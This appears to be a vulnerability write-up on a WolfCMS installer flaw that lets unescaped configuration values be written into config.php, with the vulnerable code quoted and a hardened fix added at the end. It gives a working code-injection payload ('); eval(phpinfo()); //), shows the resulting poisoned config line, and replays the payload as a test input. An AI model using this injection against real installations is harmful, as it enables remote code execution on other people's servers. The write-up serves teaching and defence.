wolfcms code audit
1. The audit process
The audit also used a mix of active and passive scanning, which helps surface parameters you would otherwise overlook; this is especially useful in a black-box audit. Of course, the experts will find nothing new here; this is written for beginners. Hee hee. As with the douphp audit, the vulnerability lies in the handling of the installer's configuration: the installation step is not verified, so a fresh configuration can be written to the configuration file. Although the parameters are wrapped in single quotes, there is no global filtering of the input, so any command can be executed. If you cannot upgrade, you can fix the vulnerability by deleting the /wolf/install folder after installation.
2. Vulnerability verification
Reading the code shows that we only need to close the quoted string and the define() call with '), so the payload is: '); eval(phpinfo()); //
Pass it in as the parameter and view the result.
3. Vulnerability analysis
We examine the files wolf/install/install.php, index.php and do-install.php for analysis.
The code is pasted directly here:
<?php
// Step 1: show the install form only while config.php is still empty
if (isset($_POST['install']) && !isset($_POST['commit']) && file_exists(CFG_FILE) && !(filesize(CFG_FILE) > 1)) {
    require_once 'install.php';
}
// Step 2: the client sends commit + config; note that CFG_FILE is not checked again here
else if (isset($_POST['install']) && isset($_POST['commit']) && isset($_POST['config'])) {
    $config = $_POST['config'];
    require_once 'do-install.php';
    require_once 'post-install.php';
}
Looking at the request data, the parameters we pass in are examined, and depending on which ones are set, different modules are entered to perform different functions. We enter do-install.php for analysis; the main code is:
// Create config.php template
$config_tmpl = new Template('config.tmpl');
$config_tmpl->assign($config);
// Get generated config.php
$config_content = $config_tmpl->fetch();
// Write config.php
if (!file_put_contents(CFG_FILE, $config_content)) {
    $error .= "<ul><li><strong>Config file could not be written!</strong></li>\n";
}
config is processed by the assign and fetch functions, so we trace those two functions:
// Stores the raw key/value pairs; nothing is escaped here
public function assign($name, $value=null) {
    if (is_array($name)) {
        foreach($name as $n => $v) {
            $this->_vars[$n] = $v;
        }
    } else {
        $this->_vars[$name] = $value;
    }
}

/**
 * Display template and return output as string
 *
 * @return string content of compiled template
 */
public function fetch() {
    ob_start();
    if ($this->_includeTemplate()) {
        return ob_get_clean();
    }
    ob_end_clean();
}
assign() only splits the data into key names and key values and stores them; the template then splices them into the output. fetch() starts output buffering, includes the template so the splicing happens inside the buffer, and finally takes the buffer contents out.
We can check the runtime values of these parameters with a debugger.
Continuing to follow the flow:
Looking at our final parameters, file_put_contents writes them to the configuration file.
Next, check the code below: including our configuration file triggers the vulnerability and achieves command execution. Let's view the configuration file:
<?php
// Database information:
// for SQLite, use sqlite:/tmp/wolf.db (SQLite 3)
// The path can only be absolute path or :memory:
// For more info look at: www.php.net/pdo
// Database settings:
define('DB_DSN', 'mysql:dbname=wolf;host=');eval(phpinfo());//;port=3306');
define('DB_USER', 'root');
define('DB_PASS', 'root');
define('TABLE_PREFIX', '');
The shell has been written successfully. Of course, we could also construct the preceding content so that the splicing completes without breaking the database connection configuration. The details are not covered here; interested readers can study that on their own.
4. Summary
This CMS was not audited systematically. When auditing, of course, we must pay attention to whether the parameters we need are controllable and whether they can be steered into the places we need. Sometimes, even though quotation marks are filtered globally, there will still be oversights that let a user-supplied variable be used without being wrapped in single quotes, which leads to SQL injection. Do not trust any parameter entered by the user, and strictly limit the type and length of the required parameters; this effectively prevents such vulnerabilities.
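As an added example (not WolfCMS's own code), here is a hardened version of the do-install.php step analysed above, applying the advice of this summary: the installer refuses to run once a config exists, every field is checked for a strict character class and length before it reaches the template, and every value is written with var_export() so that it can never close the define() call. The function names and the input field names (db_name, db_host, db_port, db_user, db_pass, table_prefix) are assumptions; the define() names match the generated config.php shown earlier.

```php
<?php
// Added example, not WolfCMS's own code. Function and field names are assumed.

/**
 * Refuse to run the installer when a lock file exists or config.php already
 * holds content. The original index.php only tests CFG_FILE on the first
 * step and trusts the client's "commit" flag; this runs on every request.
 */
function wolf_assert_installable(string $cfgFile, string $lockFile): void
{
    if (file_exists($lockFile) || (file_exists($cfgFile) && filesize($cfgFile) > 1)) {
        http_response_code(403);
        exit('Installer is locked.');
    }
}

/**
 * Validate the raw installer fields: strict character classes and lengths for
 * everything with a known shape, so a quote or parenthesis is rejected before
 * it ever reaches the template. Throws InvalidArgumentException on bad input.
 */
function wolf_validate_install_fields(array $in): array
{
    $rules = [
        'db_name'      => '/^[A-Za-z0-9_]{1,64}$/',
        'db_host'      => '/^[A-Za-z0-9.\-]{1,253}$/',
        'table_prefix' => '/^[A-Za-z0-9_]{0,32}$/',
    ];
    $out = [];
    foreach ($rules as $field => $regex) {
        $value = (string) ($in[$field] ?? '');
        if (!preg_match($regex, $value)) {
            throw new InvalidArgumentException("Invalid value for $field");
        }
        $out[$field] = $value;
    }
    $port = filter_var($in['db_port'] ?? 3306, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1, 'max_range' => 65535]]);
    if ($port === false) {
        throw new InvalidArgumentException('Invalid db_port');
    }
    $out['db_port'] = $port;
    // Credentials may legitimately contain any character; only cap the length.
    foreach (['db_user', 'db_pass'] as $field) {
        $value = (string) ($in[$field] ?? '');
        if (strlen($value) > 255) {
            throw new InvalidArgumentException("$field is too long");
        }
        $out[$field] = $value;
    }
    return $out;
}

/**
 * Render config.php. var_export() emits a quoted PHP string literal with
 * ' and \ escaped, so even a value that passed validation cannot terminate
 * the define() call.
 */
function wolf_render_config(array $v): string
{
    $dsn = sprintf('mysql:dbname=%s;host=%s;port=%d', $v['db_name'], $v['db_host'], $v['db_port']);
    $defines = [
        'DB_DSN'       => $dsn,
        'DB_USER'      => $v['db_user'],
        'DB_PASS'      => $v['db_pass'],
        'TABLE_PREFIX' => $v['table_prefix'],
    ];
    $lines = ['<?php', '// Generated by the installer; do not edit by hand.'];
    foreach ($defines as $name => $value) {
        $lines[] = sprintf("define('%s', %s);", $name, var_export($value, true));
    }
    return implode("\n", $lines) . "\n";
}

// Constructed request replaying the write-up's payload in the host field.
$attack = [
    'db_name' => 'wolf', 'db_host' => "'); eval(phpinfo()); //", 'db_port' => '3306',
    'db_user' => 'root', 'db_pass' => 'root', 'table_prefix' => '',
];
// Constructed legitimate request; the password contains a quote on purpose.
$normal = ['db_name' => 'wolf', 'db_host' => 'localhost', 'db_port' => '3306',
           'db_user' => 'root', 'db_pass' => "ro'ot", 'table_prefix' => 'wolf_'];

foreach ([$attack, $normal] as $request) {
    try {
        echo wolf_render_config(wolf_validate_install_fields($request));
    } catch (InvalidArgumentException $e) {
        // The host regex rejects quotes, parentheses and spaces, so nothing is written.
        echo 'Rejected: ', $e->getMessage(), "\n";
    }
}
```

Run stand-alone, the first request is rejected at validation and the second produces a config.php in which the quote inside the password appears as \' within a string literal. In a real deployment wolf_assert_installable() would be called at the top of the installer entry point before either branch, with a lock file created by post-install.php.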